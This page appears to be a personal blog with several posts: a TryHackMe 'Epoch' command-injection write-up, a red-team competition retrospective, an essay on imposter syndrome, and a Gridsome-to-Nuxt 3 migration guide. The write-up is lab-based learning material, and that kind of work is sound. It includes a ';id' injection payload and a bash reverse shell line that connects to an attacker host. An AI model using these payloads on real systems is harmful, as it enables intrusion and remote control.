Security Research & Web Development

Latest articles

Epoch Room Writeup

My approach to writeups:

Before we get into the post: for me, creating writeups is primarily a learning exercise. Documenting how I reached the solution is an important part of a writeup, but what I care about more is the thought process of working toward the solution, both the obstacles and the eventual discoveries. By writing this way, my goal is to improve my own thought processes and develop a more systematic methodology for approaching these problems over time. Consider these refined versions of my notes rather than polished reports.

Epoch was released as the second challenge during TryHackMe's 2022 Halloween event, and is classified as an easy web app room. The prompt for us is:

"Be honest, you have always wanted an online tool that could help you convert UNIX dates and timestamps! Wait... it doesn't need to be online, you say? Are you telling me there is a command-line Linux program that can already do the same thing? Well, of course, we already knew that! Our website actually just passes your input right along to that command-line program!"

Between the mention of command lines above and the explicit link to their room on command injection, it's certain this will be a command-injection-focused box. Once the VM was spun up, all we saw was a basic single-input form.

a bare white web page with a single field input form and an hourglass icon with the text "Epoch to UTC converter"

While it was tempting to go straight into testing command injection, I did start this process with some initial enumeration to avoid missing anything.


This wasn't an open-ended web app challenge, so I just did some quick standard checks to cover the bases.

  • HTML source: this shows up as a single page with minimal markup and no JavaScript sources loaded in at all. The <head> metadata doesn't reveal any additional information.
  • Wappalyzer: Bootstrap is the only detected technology.
  • Directory enumeration: I ran gobuster in the background while beginning command injection tests; it returned no additional directories. Manual checks for /robots.txt and /sitemap.xml while that ran also came back empty.

With that brief recon done, let's move straight into trying out command injection on our form.

Testing command injection

Passing in an epoch value, like 1680115500, returns a human-readable date as text below the form.

Note: If you want some background on the epoch format Wikipedia has a good primer.

With the expected output known, the next step was to test the simplest command injection forms. The first to check is appending a semicolon to the string, followed by a system command, in this case ;id, which will tell us whether the form returns the server's raw command output, does some other processing first, or generates an error.
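We don't know the server's actual code at this point, but a minimal sketch of the likely vulnerable pattern looks like the below. Everything here is an assumption for illustration: the `input` variable name and the exact `date -u -d` invocation are guesses at what a converter like this might run.

```shell
# Hypothetical recreation of the vulnerable backend: the form field's value
# is concatenated straight into a shell command line, so shell metacharacters
# like ';' are interpreted rather than treated as data.
input='1680115500;id'                 # an epoch value plus an injected command
sh -c "date -u -d @${input}"          # prints the converted date, then runs id
```

If the server instead passed the value as a single argument (e.g. via an exec-style API rather than a shell), the semicolon would be harmless, which is exactly what this first test distinguishes.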

This payload works and we get the output of the id command after our date. No need to test other permutations now, though for reference if this hadn't worked I would have been working off of this command injection cheatsheet.

Form response showing a date on one line, and on the following the output of the Linux id command.

With the injection confirmed I ran other enumeration commands, including whoami, ls, and ls /, to get a quick sense of what we could see.

Now, if this were a straight-to-the-solution walkthrough we would almost be done... but in my enthusiasm, with the command injection confirmed, I skipped straight to trying to pop a reverse shell on it.

The shell popping detour

To get the shell I went to Pentest Monkey's RCE cheatsheet for a bash-specific payload, as this was clearly a Linux machine based on the earlier output from id, ls, etc. I set up a netcat listener on the AttackBox with nc -lvnp [port], prepped the payload below in our form, and clicked the Convert button once the listener was active.

;bash -i >& /dev/tcp/[kaliIp]/[kaliPort] 0>&1

And yup, this gives us a shell on the box, confirming remote code execution (RCE). While this turned out not to be necessary to get the flag, it would be a major finding in an actual report, so it was worthwhile to test for. Plus, the shell is faster for continued digging into the server than passing in individual command payloads, making this detour a win-win.

Web form with a bash reverse shell payload, and the resulting terminal with responses to id and whoami displayed.

With shell access I spent some more time seeing what we could reach on the file system. We could read files in this user's home directory, /home/challenge, but couldn't look at root-owned files like /etc/shadow. Our home directory had two Go files and their compiled binaries, plus a folder "views" containing a single index.html file. None of these contained our flag.

At this point I checked the provided hint "The developer likes to store data in environment variables, can you find anything of interest there?" and went down a rabbit hole about Go environment variables for a while.

For context, I'm used to developing JavaScript front-ends, so my immediate thought was that these Go binaries might be storing their environment variables in a similar way, via .env files. But checking both the binaries and the .go files by running strings and looking for any declared variables went nowhere, and in some cases I ran into privilege limitations, so I started to investigate whether I could get root, running the LinPEAS script. However, this was at a point in my studies before I'd learned much about Linux privilege escalation, so the output it gave me wasn't as actionable as it could have been (from research on Discord the box was indeed rootable, but that's not relevant to the challenge).

Setting the root attempt aside, this is also where I missed some important hints while researching how Go handles environment variables. Namely, the examples (#1 & #2) both show Go using the os package to interact with system environment variables. My mistake was assuming the binaries were using development environment variables, so I went looking for those (and yes, they are supported in Go via the godotenv package, but that package wasn't in use here, hence the dead end).

Now, how do you check system environment variables? By running the env command.
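As a quick local demonstration of what that looks like (the FLAG name and its value here are made up for illustration, not the room's actual variable):

```shell
# env prints the environment of the current process; anything the developer
# exported into it, like a flag, shows up as NAME=value lines in the output.
FLAG='flag{not_the_real_flag}' env | grep '^FLAG='
# prints FLAG=flag{not_the_real_flag}
```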

command injection output with the FLAG env variable and flag text obscured

Problem solved and flag found. This worked directly from the form, so the reverse shell wasn't necessary to get the flag.

My key takeaway from this room: always check env during enumeration when I have some form of shell access.

CyberForce 2022 Red Teaming Retrospective

Last fall I participated in the Department of Energy's CyberForce 2022 Competition as a red team volunteer. Right off the bat it was an excellent experience, and one I intend to repeat next year, armed with more knowledge to contribute to the competition prep process.

When I signed up for this competition as a volunteer I had just barely two months' worth of heavy studying in cybersecurity. Fortunately, the start of my studies happened to coincide with TryHackMe releasing a Red Teaming path, which I jumped on—partly for the giveaway competition that THM released alongside it, but also because I felt it was a good fit for the direction I wanted to move in, long-term, in cybersecurity. Admittedly, jumping straight from refreshing IT fundamentals into red teaming material was a challenge, but with the Cyberforce competition coming up it was helpful for getting my bearings and stress-testing my Linux knowledge across all the red team labs before game day.

I didn’t know what to expect from the competition when I signed up either. I had some minor exposure to traditional CTF competitions through a local BSides CTF one the month prior to this competition, plus solving a few of the easier challenges from the Hack the Boo event that Hack the Box was running last October. But Cyberforce turned out to be a drastically different type of competition.

Unlike a typical CTF, where there is a set of challenges across a handful of categories, Cyberforce has a more linear structure, aiming to simulate a series of scenarios that the competitors work their way through. I’m not at all familiar with the collegiate cyber competition scene, but if you are: Cyberforce is similar in structure to the National Collegiate Cyber Defense Competition (CCDC). But as this is sponsored by the Department of Energy, they added an additional element: Industrial Control Systems (ICS) attack & defense.

What I liked about the competition

I don’t want to spend too much time describing the structure of the event; if you’re curious about it, the DoE maintains a page that’ll fill in the gaps (it’s also where sign-ups should go live later this year for the 2023 event in November). What I do want to mention are the areas I thought were unique and/or valuable, both as a red team volunteer and, I hope, for the competing blue teams as well.

First, this competition evolves each year. The 2022 event I took part in was set up with each blue team having its own cloud infrastructure, and the rules designated several of the machines as “assumed breach”: those couldn’t be hardened, only enumerated. Why does that matter? The scoring system rated each team on its ability to find specific artifacts in the logs from the intrusion, and to cohesively report its findings based on those indicators. That meant my goal as a red teamer here wasn’t to find a way in, but to successfully execute a specific attack chain that the blue team was scored on, receive their report, and assign them a score based on its quality.

The other aspect of this scoring was that after each scenario the blue team received a guided walkthrough of the scenario execution, aimed specifically at helping them find the gaps where they may have missed something. I hope that helping the blue team out in this way facilitated deeper learning; I know on my end it was valuable. I had to figure out what artifact(s) they missed and where, then translate what I did as an attacker into a suggestion for where or how to find the necessary evidence. I was certainly grateful for having studied some incident response fundamentals before the event, as it would have been much more difficult to facilitate the blue team’s learning without understanding the basics of logging, EDR, IDS/IPS systems, etc.

Takeaways from the red teaming volunteer experience

As for the red teaming itself, well, I can’t get into details of what was done all that much here, but I enjoyed all the practice in the days leading up to the event, and the event itself. I think the red team leaders found the sweet spot between accessibility to diverse skill levels for the volunteers and giving the blue teams a realistic simulation of actual attacks.

While I wouldn’t consider this an experience that gave me a full sense of how a red team engagement works in practice—there was no way to have enough time in a single day to do proper recon and enumeration and find a foothold for one team, let alone dozens—it did give me a better hands-on feel for the tactics that differentiate red teaming from pen testing: lateral movement, pivoting, persistence, and post-exploitation (among others). As the ICS aspect was designed to be central, all our attacks targeted those systems and/or their interfaces in some way, which put a fine point on why those critical systems should be air gapped. Also, we got to rickroll both the blue and green teams. 😈

I would say that much of what I learned was in the smaller details of how to conduct red team exercises and improvements to how I used and managed the process within the Linux VM. There are two things I’d like to highlight from what I learned:

  1. pushd and popd are shell builtins I hadn’t encountered before; they let me run operations in specific directories without having to bounce around with cd at all.
  2. Autovnet was the star tool that I have to mention. It was fantastic for the realistic-simulation aspect of the competition, allowing the dozens of red teamers, all handling different blue teams, to work without collision and use independent C2 infrastructure and IPs.
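On the first point, pushd and popd maintain a directory stack: pushd saves where you are and jumps to the target, popd takes you back. A quick sketch (the /tmp path is an arbitrary scratch directory for the example, and the commands are bash builtins):

```shell
# pushd saves the current directory on a stack and changes into the target;
# popd pops the stack and returns you to the saved directory.
mkdir -p /tmp/pushd-demo             # scratch directory for the example
start_dir=$(pwd)
pushd /tmp/pushd-demo > /dev/null    # now working in /tmp/pushd-demo
pwd                                  # prints /tmp/pushd-demo
popd > /dev/null                     # back where we started
[ "$(pwd)" = "$start_dir" ] && echo "returned to starting directory"
```

This beats `cd some/dir && ... && cd -` once you're more than one hop deep, since the stack can hold several directories at once (`dirs` shows it).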

Wrapping up

CyberForce was a great experience and I'm looking forward to doing it again in 2023. Hopefully I’ll be able to contribute earlier in the process to refine the attack chains and test my knowledge of building them, even if just a little bit.

If you're curious about red teaming, it's a good place to get some rare exposure to the process, even in a very condensed format, which makes giving it a shot an easy yes for newbies. For experienced red teamers: if you have the time to help in the R&D phase of building attacks, it can be particularly worthwhile if you have some ideas to test out. And if Windows and Active Directory are your jam, definitely consider contributing for 2023; there’s an active call for more of those methods to be used in the coming competitions.

Worst case, if you’re a bit short on time and can’t commit to an extended contribution, the Saturday of the competition was fun, if at times chaotic, all on its own.

"Sorry for the delay!..."

We've all done it before. You get an email, see that it’ll take a bit of work to reply and make a mental note to reply later that day…which becomes a couple days, max…then a week or more…. The weight of that embarrassment grows until it’s easier to have selective amnesia about receiving it than to reply. You almost always end up getting back around to it, but it just feels more and more painful to do the longer you wait. Well for me cybersecurity is that feeling: career edition. I began with cyber as my planned major straight out of high school, got into a university with a strong cyber program, started attending said school, and then life happened differently than planned and I’ve ended up with a distinctly non-linear career path since, which, thus far, hadn’t included cybersecurity as a career at all.

Well, now I’m returning to that early focus on cybersecurity. And sure, that’s a useful announcement to make on its own I suppose, but the reason I’m writing this is that there’s a useful thread woven into the more complex story (which I may tell in more detail later). That thread’s major theme is imposter syndrome.

Is passion required?

Imposter syndrome is something I’ve felt (and continue to feel) in many arenas that I’ve gone on to invest significant time and effort into, but the imposter feelings in cyber are ones that managed, the first time, to kick my ass to the point of not pursuing it further or sooner. A younger version of me would justify that choice to quit with the overplayed pretense of “you just didn’t want it enough,” to which the (hopefully) wiser present-me would say: that’s some hustle-culture bullshit that doesn’t understand how motivation works in practice.

After all, it would be tempting to conclude that you aren’t passionate enough and call it a day, except for two things. First, if you didn’t care about it at all, imposter syndrome wouldn’t show up, because imposter feelings arise from comparing yourself to others or to some high personal standard. The more insidious thought is that passion is billed as the solution both to finding happiness in a career and to overcoming obstacles on the way to success. That creates a vicious cycle where it’s easy to convince yourself of narratives like: “If true passion means sure success, then if I were truly passionate about this thing, I would be better at it.” The larger problem is that this narrative assumes passion precedes skill, when in practice it’s often the practice that develops the passion. Why? I’ll get to that in a moment, but first, back to me and cybersecurity.

Imposter syndrome seems to be extra strong in the technical aspects of cybersecurity. There’s a simple, partial explanation: it’s a massive field in which going from beginner to expert on even one domain feels like a monumental task. But that’s really not unique to cyber; I’ve been working in film for more than seven years and each department has its own rabbit holes and deep specialities that could feel insurmountable to a newbie.

One aspect in cyber that amplifies the imposter feelings has been the media profiles and narratives that exist around cybersecurity experts. These stories portray people who seem to live and breathe tech, code, and computers and because of their preternatural skills they go on to accomplish impressive feats at early ages: breaking into computers in grade school, developing a popular program at 15. All those stories lean on the passion hypothesis for why people learn and develop mastery in a field, but passion doesn’t always come first. In my own experience, it more often develops later on¹. Maybe there’s a spark of curiosity about a subject first, but the passion (or its more intense manifestation, obsession) shows up after I’ve started learning, not before. With my film career, I never had it on my radar before getting a few small opportunities to work on set with zero prior experience, and I gradually developed a deeper interest in the craft from that point.

With cybersecurity, I think that lack of hands-on exposure early on was my biggest obstacle. I’d read books on the subject and had maintained a consistent curiosity, but I hadn’t had the opportunity to validate through experience that I did indeed want to learn more.

Imposter syndrome as a beginner

As general advice for dealing with imposter syndrome, recognizing that even the expertest of experts often feel like imposters and that we’re all making it all up as we go might help, sometimes.

For beginners though, I don’t think that piece of advice is apt. I’ve spent a good number of years working as a coach and have developed a curiosity about learning and what helps us stick to our learning goals. My feeling is that for beginners, feeling like an imposter comes up most often when we aren’t understanding something or are running into more obstacles than successes. While there are people out there who enjoy bashing their head against a problem until it eventually works, that’s by no means everyone, and we lose a lot of potentially good people by setting the bar so high that it takes persevering for an irrationally long time without even a glimmer of success. There is a place for mind-bendingly difficult problems, but it isn’t anywhere near the beginning, where the foundations for how to think about solving the problem haven’t even been established.

As an example: there’s an alternate universe where I got deep into skateboarding, but when I was twelve and grinding away at learning the kickflip, it felt like I would sooner obliterate my shins than land the trick. I might have persisted if I had either a community that was helping me improve, or a better progression to learning (this was all pre-YouTube) that didn’t mean every failure hurt too much to go straight back to trying again.

And you know what? Sometimes people don’t have time to suffer through an opaque learning process, whether due to other obligations or because there are several competing interests. If you have to choose between the one that will burn twenty hours or more just getting to the starting line and another that lets you learn straight away, the latter is likely to win out. I was looking seriously at cyber again around 2015, which coincided with when I chanced into working in film. With hands-on learning while getting paid on one side, versus an uncertain road of learning the skills, dropping a few thousand on classes and certifications, and crossing my fingers for a job after all that upfront investment on the other, it’s easy to see why working in film won at the time.

Overcoming imposter syndrome

Several years later, there seems to have been a renaissance in cybersecurity education. I saw that TryHackMe (THM) had a free tier to try things out, so I figured I might as well test the waters and see if hands-on practice would change my mind about cyber this time around. Did it work? Absolutely.

Being able to spin up a ready-made virtual machine with specific challenges feels great: you get to learn discrete concepts and apply them immediately, without having to wonder whether things are failing because you did it wrong, the config is wrong, or any of a myriad other possible reasons your setup isn’t working as intended. THM got the ball rolling and helped beat back some of the beginner-specific imposter syndrome and sense of overwhelm that this field easily provokes.

With the momentum from those initial hours of success in THM rooms, when imposter syndrome inevitably rears its head again—which, with some of the CTFs I was working through, was almost daily—I’m able to put my attention toward finding small wins that keep up the feeling of momentum, even when in other areas I’m feeling stuck, like I don’t know, and never will know, enough to succeed. The sweet spot for long-term learning is where it’s hard enough that you’re a little uncomfortable and unfamiliar, but success still feels within reach.

I’ll be writing more about the specifics of my cybersecurity learning journey here later on. For now, I’ll share one of the more helpful metaphors I’ve learned about fear, of which imposter syndrome is just one variation. To paraphrase Seth Godin: fear is better seen as a dance partner than an enemy. Fear shows up when there are opportunities for growth. When fear pushes back against you, it’s a signal that what you’re doing has the potential to expand your comfort zone, skillset, and life.

When imposter syndrome shows up, treat it as a sign that you’re going in the right direction.

¹ For an exploration of why skill often precedes passion read Cal Newport's book So Good They Can't Ignore You.

Migrating from Gridsome to Nuxt 3

It's official, this site is now running on Nuxt 3!

My last big site update, switching into the Vue ecosystem with the Gridsome framework, was a few years ago. Overall Gridsome has been a great framework for building a static site using Vue 2, and a Vue 3 upgrade was on its roadmap, but like many projects the updates haven't continued—coincidentally, they stopped shortly after I transitioned to it in November 2020. With everyone still deep in the pandemic, it wasn't exactly top of mind to worry about a little JavaScript framework receiving regular updates. Fast forward about a year, though, and Nuxt 3 announced their beta. With no updates forthcoming to Gridsome, I kept it in the back of my mind to test Nuxt out. It was testing out the Content module that convinced me I should make the switch, as it would solve a few of the pain points Gridsome has with using Vue components within markdown.

Nuxt 3 had its first stable release in late 2022, so with that it was time to make the transition. On paper this shouldn't be a complex migration, considering both are Vue frameworks, but it is a jump from Vue 2 to Vue 3, with some breaking changes to consider. For me, though, the main point of migrating, beyond keeping the site updated, is to continue learning, and this project gave me an excuse to get more practice with Vue 3, TypeScript, Tailwind, and newer build tooling like Vite.

What you're seeing now is a relatively quick MVP of the Nuxt version of this site. My original intention was to tear out all the old CSS and do a refactor with Tailwind, but as I consider this design to be a temporary one while I think up a stronger visual identity it made more sense to see how well the Gridsome build would transition over without major surgery.

First impressions of Nuxt 3

There are a handful of changes in Vue 3 and in the way Nuxt is configured that make for an easier dev experience compared to Gridsome. The biggest change is Vue's composition API, which is used throughout Nuxt and especially in the Content module that powers all the markdown rendering on this site. Compared to Vue 2's mixture of mixins, filters, and plugins, it is a more consistent system. Running Vue 3 under the hood also removes the need for little things like using this.someProp in computed functions. It also helps with better code organization in single-file components, plus native TypeScript support.

That's all Vue 3; for Nuxt specifically, the largest improvements have been in overall developer experience: auto-imported components, intuitive directory-based routing, and a lot of excellent modules to add functionality to the site. For this site I'm currently using Content, VueUse, the native Nuxt Tailwind module, and Google Fonts integration. There are many, many others, some of which I'm sure I'll test out as I continue to improve the site: color-mode for easy light/dark switches, Image for, well... image optimization, Pinia for state management, a security module, etc.

Plus, the Content module specifically has a few features ranging from nice-to-have to excellent: a built-in table of contents generator for long posts like this one (you still need to make a component, but the linking part is handled; more on that later); markdown components (MDC), which make it easier to mix vanilla markdown with Vue components for handling functionality like shortcodes; and a query API that uses a MongoDB-like document syntax but is otherwise normal JavaScript. I liked Gridsome's GraphQL integration overall, but it did add another layer of complexity to the data handling process.

I've still got a lot to explore with Nuxt 3 so I'll be sure to update on particular bits I've found later. For now let's move on to specific details of the build and some of the challenges I had to solve to get it running.

The Migration & Build

For this project my approach was to start by installing Nuxt in a fresh repository, get a baseline version that renders out without errors, then introduce my old Gridsome components one by one, fixing the obvious syntax differences and tweaking them until the errors cleared.

To get the fresh install going, the Nuxt docs are well written and it was simple to start a project, in my case using NPX with npx create-nuxt-app <my-project>. This create-nuxt-app tool has a lot of handy defaults you can select, including CSS frameworks, linting, TypeScript usage, test frameworks, etc. I kept it fairly light: Tailwind, Nuxt Content, ESLint, and Universal rendering selected (which allows for both SSR and static generation).

Once that runs we have a new directory containing a minimalist project with only a few files: a main app.vue entry point, plus nuxt.config.ts and tsconfig.json. From there, to quickly mock up our directory structure and fill in a few essential pieces, we can create the root /components, /pages, /assets, and /public directories. Next, to generate boilerplate pages and components, we can use Nuxt's CLI, Nuxi: running nuxi add component componentName scaffolds components (this supports all the major types) and nuxi add page pageName creates initial pages.

As a quick aside: our create-nuxt-app step handled installing our module dependencies for us. To add more, or to modify their configuration, you edit nuxt.config.ts. With Gridsome there was a main.js file in the root that handled CSS imports and other JavaScript dependencies, but with Nuxt those are also all handled in the config file. It is also responsible for site-wide head metadata and some of the Nitro server's behavior (this will come up later when setting up sitemaps and RSS).

As we're using the Content module for handling our copy and media rendering, the other piece we need to set up is a /content directory. Nuxt Content will parse any .md or .yaml files in that directory, generating a route for each based on its path. But to actually render those views we need to cover two areas: our layout and the individual page views.

The simplest way to handle site layout, as recommended in the Getting Started docs, is to create an app.vue file in the root directory which includes the NuxtPage component, which itself is acting as a wrapper around Vue Router's RouterView component. The baseline component will look like this:

<NuxtPage />

But in my case I want to future-proof my design a little and allow for multiple possible layouts, so I also created a component in the layouts directory, /layouts/default.vue, where I handle loading in all the child components necessary to the basic layout. To make this work we also need to wrap our NuxtPage component in app.vue with <NuxtLayout></NuxtLayout>. Lastly, we need to include a <slot /> in our new layout file where we want our content to be loaded.
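Putting those pieces together, the two files look roughly like this. SiteHeader and SiteFooter are placeholder names for auto-imported layout components, not my actual ones, so treat this as a sketch of the shape rather than the real source:

```html
<!-- app.vue: every page renders through the active layout -->
<template>
  <NuxtLayout>
    <NuxtPage />
  </NuxtLayout>
</template>

<!-- layouts/default.vue: the default layout; the slot marks where
     page content lands. SiteHeader/SiteFooter are hypothetical
     components auto-imported from /components. -->
<template>
  <div>
    <SiteHeader />
    <main>
      <slot />
    </main>
    <SiteFooter />
  </div>
</template>
```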

With the layout set, I have two major content types that need to be rendered from Markdown: general pages and blog posts. Nuxt makes this easy, as it supports dynamic routing with a bracket syntax to denote the variable: [slug].vue will generate a route per unique slug, and other route parameters and custom parameters are supported as well. Nuxt also supports using the spread operator (...) with our parameters to create catch-all dynamic routes like [...slug].vue. With that catch-all route component you could render out all of your markdown content with just this in your component:

<ContentDoc />

Under the hood, ContentDoc automatically reads the current route parameters to source the correct data and render it out to the page. Even though this [...slug].vue template lives at the root of /pages, it will also automatically create routes for pages nested further into the folder hierarchy defined in /content. If that's all you need, then great!

If you want more precise control over certain page templates you can go further, as I did, and define additional route-specific components. I added dedicated blog components in order to support functions like pagination and tags that aren't needed by other pages. To create those dynamic routes I made a /pages/blog subdirectory for our routing, with a dynamic route at /pages/blog/[slug].vue and an index page, /pages/blog/index.vue, to catch anyone going to /blog. Nuxt's behavior here is similar to CSS specificity: if there are multiple matching components it could use to manage a dynamic route, it favors the most specific one, only choosing a more generic option (like our root [...slug].vue) if it doesn't find any others first. With this done, we have all our routes rendering out for any page created within /content!

Displaying metadata

The catch with the ContentDoc method above is that it only renders the body of a markdown document. My markdown docs also contain metadata inside a YAML-formatted header. Nuxt already reads this data correctly, but it doesn't include it in the rendering using the above method. In working on this I discovered at least two ways to address the issue. The documented method is to use ContentDoc with a v-slot attribute, <ContentDoc v-slot="{ doc }">, which gives us a doc object to work with. That object is then passed on to a nested ContentRenderer component with <ContentRenderer :value="doc">, and we can nest HTML inside to access our individual metadata items with the standard Vue double-mustache syntax, e.g. <h1>{{ doc.title }}</h1>. For rendering the body of our markdown content, the last step is to nest one final component, <ContentRendererMarkdown :value="doc" />, with its value attribute taking the whole object loaded in from ContentDoc earlier. A full example below:

<ContentDoc v-slot="{ doc }">
  <h1>{{ doc.title }}</h1>
  <time>{{ doc.date }}</time>
  <ContentRenderer :value="doc">
    <ContentRendererMarkdown :value="doc" />
  </ContentRenderer>
</ContentDoc>

In my early testing of the build this approach worked well, and it's still in use for my catch-all pages route. But while I was researching the best way to add pagination functions to Nuxt, I found an excellent Nuxt 3 blog written by Debbie O'Brien. Looking in her site's GitHub repo, I saw that she implemented the above metadata and routing functions differently, loading our markdown page's object within the script section of the component rather than in the template, leveraging the useAsyncData method to access one of Nuxt Content's main composables: queryContent(). This approach has the advantage of letting us manipulate and format the data in our JavaScript first, before passing it off to the template. In more specific use cases this would also allow you to take that data query and destructure the object to bring in only what you need in the component. This method will also come in handy for more complex queries, as it accesses the MongoDB-like query API that Nuxt Content uses.

With the above approach the /blog/[slug].vue component ends up looking something like this:

<script setup lang="ts">
// BlogPost is a local interface describing the post's front matter.
const { path } = useRoute()
const { data: blogPost } = await useAsyncData(path.replace(/\/$/, ''), () =>
  queryContent<BlogPost>('blog')
    .where({ _path: path })
    .findOne()
)
const title: string = blogPost.value?.title || ''
const date: string = blogPost.value?.date || ''
// ...
</script>

<template>
  <article v-if="blogPost">
    <header class="mb-8">
      <h1 class="mb-0">{{ title }}</h1>
      <div class="blog-date mt-1">
        <span>Published on <time>{{ useDateFormat(date, 'D MMMM, YYYY').value }}</time></span>
      </div>
    </header>
    <ContentRenderer :value="blogPost" class="shiki">
      <template #empty>
        <p>No content found.</p>
      </template>
    </ContentRenderer>
  </article>
</template>

A few small notes on this version:

  1. Having the <template #empty> segment is necessary here; otherwise the page will render out with no body content.
  2. The useDateFormat you see for our date is a composable from the super handy VueUse module. I had initially gone into Vue 2 mode and wanted to create a filter, but that's not the Vue 3 way: a composable is how a global utility function should be implemented in Vue 3.
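To illustrate the composable point, here's a stripped-down sketch of a date formatter in the spirit of useDateFormat. The helper name and the limited token set are my own for illustration, not VueUse's API (the real composable returns a reactive ref and supports many more tokens):

```typescript
// Minimal sketch of a useDateFormat-style helper (illustrative only).
const MONTHS = [
  'January', 'February', 'March', 'April', 'May', 'June',
  'July', 'August', 'September', 'October', 'November', 'December',
]

function formatDate(input: string | Date, format: string): string {
  const d = new Date(input)
  // Replace tokens in an order that avoids clobbering: the lone 'D' token
  // is handled before 'MMMM', since month names also contain a capital D.
  return format
    .replace('D', String(d.getDate()))
    .replace('MMMM', MONTHS[d.getMonth()])
    .replace('YYYY', String(d.getFullYear()))
}
```

The real thing is more robust, but the shape is the same: a plain function you can call from any component, instead of a template-bound filter.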

At this point, the above components plus your general layout components for handling the header, footer, navigation, etc. are enough to have a functional site for reading the pages and posts. However, as this is a blog, I'd be remiss not to add some basic RSS and sitemap functions as well.

Nuxt Servers: RSS & Sitemaps

Discussing Nuxt servers in depth is beyond the scope of what I'm trying to do here; if you're curious, read the docs as a starting point. For me right now the goal of using server functions is to create XML routes that add sitemap and RSS functionality to the site. With Nuxt server we need to place our scripts in the /server/routes folder for each of them to get a route directly off the root domain.

For our sitemap we can rely on the documentation for this function from Nuxt Content, as it works well enough as described. Create a sitemap.xml.ts file in our server routes directory, copy the code in the docs, set the nitro server config as specified, and update the hostname URL value to have a working sitemap at the route /sitemap.xml.
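For reference, the recipe in the Nuxt Content docs has roughly this shape; the hostname and changefreq values here are placeholders, and the sitemap package needs to be installed:

```ts
// server/routes/sitemap.xml.ts -- a sketch of the docs recipe;
// 'https://example.com' is a placeholder hostname.
import { serverQueryContent } from '#content/server'
import { SitemapStream, streamToPromise } from 'sitemap'

export default defineEventHandler(async (event) => {
  const sitemap = new SitemapStream({ hostname: 'https://example.com' })
  // Query every parsed content document and write its path to the stream.
  const docs = await serverQueryContent(event).find()
  for (const doc of docs) {
    sitemap.write({ url: doc._path, changefreq: 'monthly' })
  }
  sitemap.end()
  return streamToPromise(sitemap)
})
```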

For RSS, our server setup works differently as I want to limit the query to just the blog posts. In the future I may try and break this out into categories, but for now the implementation written up here worked as expected. Just be sure to install the rss library from NPM as a dev dependency, which wasn't mentioned explicitly in that guide. With that complete our RSS feed is accessible at /rss.xml.

Leveraging the table of contents feature

Writing lengthier posts like this one brings us to one of the last features I wanted working in version 1 of this site: table of contents lists. Nuxt Content comes with a built-in table of contents generator for any markdown file that it parses and renders. Out of the box, this feature walks through your markdown content looking for headers (header depth is defined in nuxt.config.ts, see the docs). For each header it finds, it automatically adds an id attribute to the header tag, matching the header text, along with a nested anchor link in the format #your-route-slug-here.
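Conceptually, the anchor generation is just a slugify pass over each heading's text. A rough TypeScript equivalent of that transformation (my own sketch, not Nuxt Content's actual implementation) looks like:

```typescript
// Rough sketch of the heading-to-anchor transformation: lowercase the
// heading text, strip punctuation, and join words with hyphens.
function slugify(text: string): string {
  return text
    .toLowerCase()
    .trim()
    .replace(/[^a-z0-9\s-]/g, '')
    .replace(/\s+/g, '-')
}

// A heading like "Future Plans" then gets rendered with id="future-plans"
// and a nested <a href="#future-plans"> anchor link.
```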

The small downside is that, left untouched, this visually turns all your headers into links, so I set up a quick CSS adjustment to strip them of the default link behavior:

a[href^="#"] {
  pointer-events: none;
  text-decoration: none;
}
However, that's where the plain install of Nuxt Content stops with the TOC feature. To make use of those anchor links we need to create a component. Debbie's Nuxt repo from earlier already has a TOC component, so for simplicity I implemented that component with some stylistic adjustments, and it immediately worked as intended. The one tweak I've made is to treat the TOC as an optional component, rather than including it by default in every blog post. This was accomplished with a simple metadata property in the markdown header, hasToc: true, and a v-if statement on the div wrapping our component: v-if="hasToc". I considered trying to make this work using an MDC (markdown component) within the markdown file, as an excuse to figure out how Nuxt handles MDC, but based on the docs MDC doesn't support passing in objects as props, so it wouldn't work in this case... and in hindsight it would have been a pain to reposition.
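Put together, the toggle is a front-matter flag plus a guard in the template. A sketch, where the Toc component name stands in for the component borrowed from Debbie's repo and blogPost is the queried document:

```html
<!-- In the markdown file's YAML header:
title: Example post
hasToc: true
-->

<!-- In the blog component's template: -->
<div v-if="blogPost?.hasToc">
  <Toc :toc="blogPost.body.toc" />
</div>
```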

Future plans

As a starting point for this site I'm pretty happy with how it's running now. However, this was always intended as a transitional phase, as my long-term goal is to shift this site into a monorepo structure that I think Nuxt, with its auto imports and heavy use of composables, is well-suited for. That should help with my overall goal of having a more DRY development process for my own internal projects, so that I can easily share work across them without needing to manage multiple repositories.

Beyond that big-picture structural shift, I expect to tinker around the edges of this current version: implementing some necessary features (full pagination, search, categories and tags, etc.) plus nice-to-have tweaks to the design, including animations, improvements to navigation, and other miscellaneous elements. Concurrently with those improvements I'll be thinking up a stronger visual identity for this place. I had originally built this site as a sort of base template test, with good typographic defaults, to build on top of, so the design is rather bare bones. But the real priority now that the migration is done is to start putting out more writing, so the design updates will come in time.

Static site updates with Gridsome

Wow, it's been about five years since I first made the switch to static sites and moved all of mine to Hugo. The upsides were so good, chief among them no need to keep on top of updates for the sites to continue living (worry free) on the internet, that once I wasn't regularly writing new articles I was able to forget about them until the next time I needed to make changes. With significant shifts in my career since that time I'd spent much less time updating the sites, keeping in mind a long-term idea to maybe add some nice front-end functionality via Vue.js, mostly as an excuse to keep my skills sharp.

Fast forward to last year: I had found a nice Vue framework, Gridsome, that I had begun to use for a more complex internal project and was gradually tinkering with. Around that time it finally reached the point where I needed to make some changes to the live Hugo sites, and as part of that process update Hugo to the latest version. Unfortunately the updates had made changes to the template language and other areas that were silently failing in the build, and after a few days of frustration I decided I might as well try Gridsome on at least one site and see how it went. I was particularly drawn to the GraphQL-based queries it uses to make the Vue templates work, which I thought would make for a nice, non-Google-based site search. Plus, keeping my learning orientation going, I saw that Gridsome gave you more control over the site: in creating Vue templates you also have the ability to write the front-end logic and share data between components as you would with any front-end application, and of course I would be working in Javascript (and Vue) instead of a template-only use of Go.

The downside? It takes more work. I still strongly recommend Hugo, as it works well without significant setup and is probably still able to build large sites faster. Hugo has had a lot of developer effort, even in the early stages, put into internal tools like pagination, various media embeds (Youtube, Instagram, etc.), and metadata handling, so you don't need to do as much work up front. Sure, if you were like me it still required writing the HTML templates, configuring the toolchain for postCSS to handle styling, and then writing the necessary CSS code, but beyond that you put markdown files in directories with some basic metadata and it generally worked straight away. Which isn't to say Gridsome doesn't, mind you; it does require initial configuration, unless you pick a starter project you like and use it without modification, in which case it also just works.

